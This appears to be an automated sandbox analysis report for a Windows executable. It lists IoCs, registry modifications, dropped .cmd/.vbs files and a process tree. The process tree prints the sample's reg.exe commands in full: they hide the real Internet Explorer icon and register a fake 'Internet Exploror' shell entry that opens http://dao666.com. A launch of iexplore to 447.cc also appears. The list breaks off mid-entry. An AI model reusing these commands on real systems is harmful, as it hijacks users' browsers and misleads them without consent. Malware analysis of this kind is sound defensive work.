aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c

Analysis

max time kernel
144s
max time network
514s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
01/12/2022, 13:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c.exe
Size

111KB
MD5

b47521b53daafca6ff9d890bd6adb42a
SHA1

196b0983da2c215ac9931ffddf78e766c2d1761b
SHA256

aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c
SHA512

fedf94d2505cbde019fc404c3c71db552d0bc74425b3364064acda568b91bb7d3b8ceed5db87b00a94a9a5e75f54869cbc6df95e595f899dc4b0932359fc3043
SSDEEP

3072:WwxVMhOC/dTDbq91+mno3t4QZQ3rAHfip:WTfFDbRnOTrA/a

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WinsWare\is.cmd	cmd.exe
File created	C:\Program Files\WinsWare\to.cmd	cmd.exe
File opened for modification	C:\Program Files\WinsWare\to.cmd	cmd.exe
File created	C:\Program Files\WinsWare\winare.vbs	cmd.exe
File opened for modification	C:\Program Files\WinsWare\winare.vbs	cmd.exe
File created	C:\Program Files\WinsWare\361.cmd	cmd.exe
File opened for modification	C:\Program Files\WinsWare\361.cmd	cmd.exe
File created	C:\Program Files\WinsWare\is.cmd	cmd.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Mail\UltraEdls\winare.vbs	cmd.exe
File opened for modification	C:\Windows\Mail\UltraEdls\winare.vbs	cmd.exe
File created	C:\Windows\Mail\UltraEdls\is.cmd	cmd.exe
File opened for modification	C:\Windows\Mail\UltraEdls\is.cmd	cmd.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3504	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 26 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e052c3635507d901	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376864064"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{85E5E612-7348-11ED-919F-5695DBFAB5D8} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e6851ef31fd3cf49b332bbb4721c974800000000020000000000106600000001000020000000c6a30906321817a18674408719f3f661b82384e31d304e5b016edfb548382b40000000000e800000000200002000000047dcb7d30e16267afe9e99645e5953aa9726b529c39765a284b81454542178fa200000008356c17ec32838d735b59e647aef3f4c902511654f382ce39b30fef83a6abac0400000009788d3e7a355e50963bade0909179470de9457b34b5afa76db76c638542a725aeec0136fb5d223dc558c40632dcad9e7253aa7934bd0ad04aab82555410aa5f3	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e6851ef31fd3cf49b332bbb4721c974800000000020000000000106600000001000020000000893d731388284b9b6b31d534bf12d77a08b97f2beb3dbb0146cd08efb2200804000000000e800000000200002000000030cccc5996e804b5bf67848eb72c7f0a01c95d3c2644ad553393548cc2709f9920000000e43efaf3a0605375a293ea831ee3880eff11bad1a5c378bce6c56cde46ee9e0f400000004ece3cb1819d45f1116dec2b9efb43ad58cc7e7f067725b2f47cc4b2f399bcc8822c6a0b75f32004343721ffda981cc8c7be8cabc8e615d7e95fa633793d0e41	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 7055e26b5507d901	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe

Modifies registry class 45 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Exploror"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://dao666.com/?ha"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ = "┤≥┐¬╓≈╥│(&H)"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://dao666.com/?ha"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings	aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InfoTip = "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\WantsParsDisplayName	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "shdoclc.dll,0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideFolderVerbs	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideOnDesktopPerUser	reg.exe

Runs net.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4748	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4748	iexplore.exe
4748	iexplore.exe
3316	IEXPLORE.EXE
3316	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2104 wrote to memory of 2140	2104	aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c.exe	77
PID 2104 wrote to memory of 2140	2104	aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c.exe	77
PID 2104 wrote to memory of 2140	2104	aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c.exe	77
PID 2140 wrote to memory of 4308	2140	WScript.exe	78
PID 2140 wrote to memory of 4308	2140	WScript.exe	78
PID 2140 wrote to memory of 4308	2140	WScript.exe	78
PID 4308 wrote to memory of 4748	4308	cmd.exe	80
PID 4308 wrote to memory of 4748	4308	cmd.exe	80
PID 2140 wrote to memory of 3176	2140	WScript.exe	82
PID 2140 wrote to memory of 3176	2140	WScript.exe	82
PID 2140 wrote to memory of 3176	2140	WScript.exe	82
PID 3176 wrote to memory of 1392	3176	cmd.exe	84
PID 3176 wrote to memory of 1392	3176	cmd.exe	84
PID 3176 wrote to memory of 1392	3176	cmd.exe	84
PID 3176 wrote to memory of 4192	3176	cmd.exe	85
PID 3176 wrote to memory of 4192	3176	cmd.exe	85
PID 3176 wrote to memory of 4192	3176	cmd.exe	85
PID 3176 wrote to memory of 1836	3176	cmd.exe	86
PID 3176 wrote to memory of 1836	3176	cmd.exe	86
PID 3176 wrote to memory of 1836	3176	cmd.exe	86
PID 3176 wrote to memory of 4508	3176	cmd.exe	87
PID 3176 wrote to memory of 4508	3176	cmd.exe	87
PID 3176 wrote to memory of 4508	3176	cmd.exe	87
PID 3176 wrote to memory of 3948	3176	cmd.exe	88
PID 3176 wrote to memory of 3948	3176	cmd.exe	88
PID 3176 wrote to memory of 3948	3176	cmd.exe	88
PID 3176 wrote to memory of 5080	3176	cmd.exe	89
PID 3176 wrote to memory of 5080	3176	cmd.exe	89
PID 3176 wrote to memory of 5080	3176	cmd.exe	89
PID 3176 wrote to memory of 1776	3176	cmd.exe	90
PID 3176 wrote to memory of 1776	3176	cmd.exe	90
PID 3176 wrote to memory of 1776	3176	cmd.exe	90
PID 3176 wrote to memory of 3440	3176	cmd.exe	91
PID 3176 wrote to memory of 3440	3176	cmd.exe	91
PID 3176 wrote to memory of 3440	3176	cmd.exe	91
PID 3176 wrote to memory of 2816	3176	cmd.exe	92
PID 3176 wrote to memory of 2816	3176	cmd.exe	92
PID 3176 wrote to memory of 2816	3176	cmd.exe	92
PID 4748 wrote to memory of 3316	4748	iexplore.exe	93
PID 4748 wrote to memory of 3316	4748	iexplore.exe	93
PID 4748 wrote to memory of 3316	4748	iexplore.exe	93
PID 3176 wrote to memory of 1460	3176	cmd.exe	94
PID 3176 wrote to memory of 1460	3176	cmd.exe	94
PID 3176 wrote to memory of 1460	3176	cmd.exe	94
PID 3176 wrote to memory of 5004	3176	cmd.exe	95
PID 3176 wrote to memory of 5004	3176	cmd.exe	95
PID 3176 wrote to memory of 5004	3176	cmd.exe	95
PID 3176 wrote to memory of 3824	3176	cmd.exe	96
PID 3176 wrote to memory of 3824	3176	cmd.exe	96
PID 3176 wrote to memory of 3824	3176	cmd.exe	96
PID 3176 wrote to memory of 3124	3176	cmd.exe	97
PID 3176 wrote to memory of 3124	3176	cmd.exe	97
PID 3176 wrote to memory of 3124	3176	cmd.exe	97
PID 3176 wrote to memory of 3292	3176	cmd.exe	98
PID 3176 wrote to memory of 3292	3176	cmd.exe	98
PID 3176 wrote to memory of 3292	3176	cmd.exe	98
PID 3176 wrote to memory of 3040	3176	cmd.exe	99
PID 3176 wrote to memory of 3040	3176	cmd.exe	99
PID 3176 wrote to memory of 3040	3176	cmd.exe	99
PID 3176 wrote to memory of 4640	3176	cmd.exe	100
PID 3176 wrote to memory of 4640	3176	cmd.exe	100
PID 3176 wrote to memory of 4640	3176	cmd.exe	100
PID 3176 wrote to memory of 3688	3176	cmd.exe	101
PID 3176 wrote to memory of 3688	3176	cmd.exe	101

C:\Users\Admin\AppData\Local\Temp\aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c.exe
"C:\Users\Admin\AppData\Local\Temp\aabbeb6e806fd3e4684822154d301244a30b05b45e09d5e6d1f63c1c0bb0db8c.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2104
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\7xdown.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2140
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C start /min iexplore http://447.cc/index2.html?7xdown
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4308
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://447.cc/index2.html?7xdown
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4748
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4748 CREDAT:17410 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:3316
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\to.cmd
    3⤵
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:3176
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t REG_DWORD /d 1 /f
      4⤵
      PID:1392
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      Modifies registry class
      PID:4192
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f
      4⤵
      Modifies registry class
      PID:1836
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f
      4⤵
      Modifies registry class
      PID:4508
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"
      4⤵
      Modifies registry class
      PID:3948
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
      4⤵
      Modifies registry class
      PID:5080
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"
      4⤵
      Modifies registry class
      PID:1776
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
      4⤵
      Modifies registry class
      PID:3440
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
      4⤵
      Modifies registry class
      PID:2816
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"
      4⤵
      Modifies registry class
      PID:1460
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
      4⤵
      Modifies registry class
      PID:5004
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"
      4⤵
      Modifies registry class
      PID:3824
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
      4⤵
      Modifies registry class
      PID:3124
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"
      4⤵
      Modifies registry class
      PID:3292
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://dao666.com/?ha" /f
      4⤵
      Modifies registry class
      PID:3040
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"
      4⤵
      Modifies registry class
      PID:4640
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"
      4⤵
      Modifies registry class
      PID:3688
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://dao666.com/?ha" /f
      4⤵
      Modifies registry class
      PID:4140
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"
      4⤵
      Modifies registry class
      PID:3592
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry class
      PID:2632
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:3520
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:4672
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:4332
  - - C:\Windows\SysWOW64\reg.exe
